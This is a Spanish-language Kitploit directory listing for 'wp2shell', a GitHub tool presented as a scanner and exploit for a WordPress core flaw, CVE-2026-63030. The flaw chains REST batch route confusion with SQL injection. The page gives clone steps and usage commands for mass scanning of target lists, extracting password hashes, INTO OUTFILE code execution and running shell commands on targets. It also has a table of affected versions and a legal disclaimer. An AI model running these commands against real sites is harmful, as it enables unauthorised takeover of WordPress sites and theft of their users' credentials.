Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wp2shell — wp2shell - Exploit y escáner de WordPress CVE-2026-63030 | Kitploit
Herramientas/GitHubGitHub/lutfifakee-project/wp2shell
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - Exploit y escáner de WordPress CVE-2026-63030

Ver Repositorio
61hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔍 wp2shell - Escáner y Exploit de Vulnerabilidad CVE-2026-63030 de WordPress

⚡ Escáner y Exploit de Vulnerabilidad en Tiempo Real para CVE-2026-63030 (wp2shell)


📌 Descripción general

wp2shell es un kit de herramientas integral para detectar y explotar CVE-2026-63030, una vulnerabilidad crítica en WordPress que permite a atacantes no autenticados ejecutar código remoto mediante confusión de rutas por lotes de la API REST combinada con inyección SQL.

🔍 ¿Qué es CVE-2026-63030?

CVE-2026-63030 (wp2shell) es una vulnerabilidad crítica descubierta por Adam Kues (Assetnote / Searchlight Cyber) que afecta al núcleo de WordPress. Combina dos errores:

  1. GHSA-ff9f-jf42-662q - Confusión de rutas por lotes REST
  2. GHSA-fpp7-x2x2-2mjf - Inyección SQL author__not_in

📊 Versiones afectadas



📦 Clonación y configuración

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ Herramientas incluidas

1️⃣ wp2shell_scanner.py - Escáner rápido

Escáner en tiempo real multiproceso para la detección de vulnerabilidades a gran escala.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - Exploit INTO OUTFILE

Demuestra la variante RCE INTO OUTFILE (requiere privilegio FILE de MySQL).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - Exploit de un solo archivo

Versión portátil y de un solo archivo del exploit con funcionalidad completa.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ Aviso legal

IMPORTANTE: Esta herramienta es solo para fines educativos y de pruebas autorizadas.

  • Úsala únicamente en sistemas de tu propiedad o para los que tengas permiso explícito por escrito para probar.
  • El acceso no autorizado a sistemas informáticos es ilegal.
  • Los desarrolladores no asumen ninguna responsabilidad por el mal uso de este software.
  • Úsala de manera responsable y ética.
Descargar herramienta
Rango de versionesImpactoEstado
6.9.0 - 6.9.4🔴 RCE (Crítico)❌ Vulnerable
7.0.0 - 7.0.1🔴 RCE (Crítico)❌ Vulnerable
6.8.0 - 6.8.5🟡 SQLi (Alto)❌ Vulnerable
6.9.5+ / 7.0.2+✅ Parcheado✅ Seguro